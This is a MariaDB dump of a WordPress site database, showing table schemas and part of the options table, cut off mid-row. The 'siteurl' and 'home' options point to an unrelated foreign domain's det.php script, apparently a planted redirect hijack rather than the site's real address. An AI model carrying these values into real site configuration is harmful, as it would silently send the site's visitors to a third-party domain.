/*!999999\- enable the sandbox mode */ 
-- MariaDB dump 10.19  Distrib 10.5.25-MariaDB, for Linux (x86_64)
--
-- Host: localhost    Database: fmedia_dabinter
-- ------------------------------------------------------
-- Server version	10.5.25-MariaDB

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `wm_commentmeta`
--

DROP TABLE IF EXISTS `wm_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wm_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wm_commentmeta`
--

LOCK TABLES `wm_commentmeta` WRITE;
/*!40000 ALTER TABLE `wm_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wm_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wm_comments`
--

DROP TABLE IF EXISTS `wm_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wm_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT '',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wm_comments`
--

LOCK TABLES `wm_comments` WRITE;
/*!40000 ALTER TABLE `wm_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wm_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wm_links`
--

DROP TABLE IF EXISTS `wm_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wm_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wm_links`
--

LOCK TABLES `wm_links` WRITE;
/*!40000 ALTER TABLE `wm_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wm_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wm_options`
--

DROP TABLE IF EXISTS `wm_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wm_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`)
) ENGINE=InnoDB AUTO_INCREMENT=1203 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wm_options`
--

LOCK TABLES `wm_options` WRITE;
/*!40000 ALTER TABLE `wm_options` DISABLE KEYS */;
INSERT INTO `wm_options` VALUES (1,'siteurl','https://for.dontkinhooot.tw/det.php?id=pn34322-35-236-211','yes'),(2,'home','https://for.dontkinhooot.tw/det.php?id=lpn34322-35-236-211','yes'),(3,'blogname','Dabinter','yes'),(4,'blogdescription','Web here','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','donny@futuremediatrix.com','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','0','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%postname%/','yes'),(29,'rewrite_rules','a:153:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:57:\"slider-locations/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?slider-locations=$matches[1]&feed=$matches[2]\";s:52:\"slider-locations/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?slider-locations=$matches[1]&feed=$matches[2]\";s:33:\"slider-locations/([^/]+)/embed/?$\";s:49:\"index.php?slider-locations=$matches[1]&embed=true\";s:45:\"slider-locations/([^/]+)/page/?([0-9]{1,})/?$\";s:56:\"index.php?slider-locations=$matches[1]&paged=$matches[2]\";s:27:\"slider-locations/([^/]+)/?$\";s:38:\"index.php?slider-locations=$matches[1]\";s:53:\"project-type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?project-type=$matches[1]&feed=$matches[2]\";s:48:\"project-type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?project-type=$matches[1]&feed=$matches[2]\";s:29:\"project-type/([^/]+)/embed/?$\";s:45:\"index.php?project-type=$matches[1]&embed=true\";s:41:\"project-type/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?project-type=$matches[1]&paged=$matches[2]\";s:23:\"project-type/([^/]+)/?$\";s:34:\"index.php?project-type=$matches[1]\";s:59:\"project-attributes/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:57:\"index.php?project-attributes=$matches[1]&feed=$matches[2]\";s:54:\"project-attributes/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:57:\"index.php?project-attributes=$matches[1]&feed=$matches[2]\";s:35:\"project-attributes/([^/]+)/embed/?$\";s:51:\"index.php?project-attributes=$matches[1]&embed=true\";s:47:\"project-attributes/([^/]+)/page/?([0-9]{1,})/?$\";s:58:\"index.php?project-attributes=$matches[1]&paged=$matches[2]\";s:29:\"project-attributes/([^/]+)/?$\";s:40:\"index.php?project-attributes=$matches[1]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:39:\"home_slider/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:49:\"home_slider/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:69:\"home_slider/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"home_slider/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"home_slider/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:45:\"home_slider/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:28:\"home_slider/([^/]+)/embed/?$\";s:44:\"index.php?home_slider=$matches[1]&embed=true\";s:32:\"home_slider/([^/]+)/trackback/?$\";s:38:\"index.php?home_slider=$matches[1]&tb=1\";s:40:\"home_slider/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?home_slider=$matches[1]&paged=$matches[2]\";s:47:\"home_slider/([^/]+)/comment-page-([0-9]{1,})/?$\";s:51:\"index.php?home_slider=$matches[1]&cpage=$matches[2]\";s:36:\"home_slider/([^/]+)(?:/([0-9]+))?/?$\";s:50:\"index.php?home_slider=$matches[1]&page=$matches[2]\";s:28:\"home_slider/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:38:\"home_slider/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:58:\"home_slider/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"home_slider/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"home_slider/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:34:\"home_slider/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:41:\"nectar_slider/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:51:\"nectar_slider/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:71:\"nectar_slider/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"nectar_slider/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"nectar_slider/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:47:\"nectar_slider/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:30:\"nectar_slider/([^/]+)/embed/?$\";s:46:\"index.php?nectar_slider=$matches[1]&embed=true\";s:34:\"nectar_slider/([^/]+)/trackback/?$\";s:40:\"index.php?nectar_slider=$matches[1]&tb=1\";s:42:\"nectar_slider/([^/]+)/page/?([0-9]{1,})/?$\";s:53:\"index.php?nectar_slider=$matches[1]&paged=$matches[2]\";s:49:\"nectar_slider/([^/]+)/comment-page-([0-9]{1,})/?$\";s:53:\"index.php?nectar_slider=$matches[1]&cpage=$matches[2]\";s:38:\"nectar_slider/([^/]+)(?:/([0-9]+))?/?$\";s:52:\"index.php?nectar_slider=$matches[1]&page=$matches[2]\";s:30:\"nectar_slider/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:40:\"nectar_slider/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:60:\"nectar_slider/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"nectar_slider/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"nectar_slider/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:36:\"nectar_slider/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:37:\"portfolio/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:47:\"portfolio/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:67:\"portfolio/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"portfolio/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"portfolio/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:43:\"portfolio/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:26:\"portfolio/([^/]+)/embed/?$\";s:42:\"index.php?portfolio=$matches[1]&embed=true\";s:30:\"portfolio/([^/]+)/trackback/?$\";s:36:\"index.php?portfolio=$matches[1]&tb=1\";s:38:\"portfolio/([^/]+)/page/?([0-9]{1,})/?$\";s:49:\"index.php?portfolio=$matches[1]&paged=$matches[2]\";s:45:\"portfolio/([^/]+)/comment-page-([0-9]{1,})/?$\";s:49:\"index.php?portfolio=$matches[1]&cpage=$matches[2]\";s:34:\"portfolio/([^/]+)(?:/([0-9]+))?/?$\";s:48:\"index.php?portfolio=$matches[1]&page=$matches[2]\";s:26:\"portfolio/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:36:\"portfolio/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:56:\"portfolio/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:51:\"portfolio/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:51:\"portfolio/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:32:\"portfolio/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:38:\"index.php?&page_id=5&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:3:{i:0;s:36:\"contact-form-7/wp-contact-form-7.php\";i:1;s:33:\"duplicate-post/duplicate-post.php\";i:2;s:35:\"js_composer_salient/js_composer.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','','no'),(40,'template','salient','yes'),(41,'stylesheet','salient-child','yes'),(42,'comment_whitelist','1','yes'),(43,'blacklist_keys','','no'),(44,'comment_registration','0','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','38590','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','0','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','page','yes'),(54,'tag_base','','yes'),(55,'show_avatars','1','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','0','yes'),(70,'close_comments_days_old','14','yes'),(71,'thread_comments','1','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','0','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:3:{i:1;a:0:{}i:2;a:4:{s:5:\"title\";s:3:\"Tes\";s:4:\"text\";s:20:\"Tes 123\r\n\r\nkopi 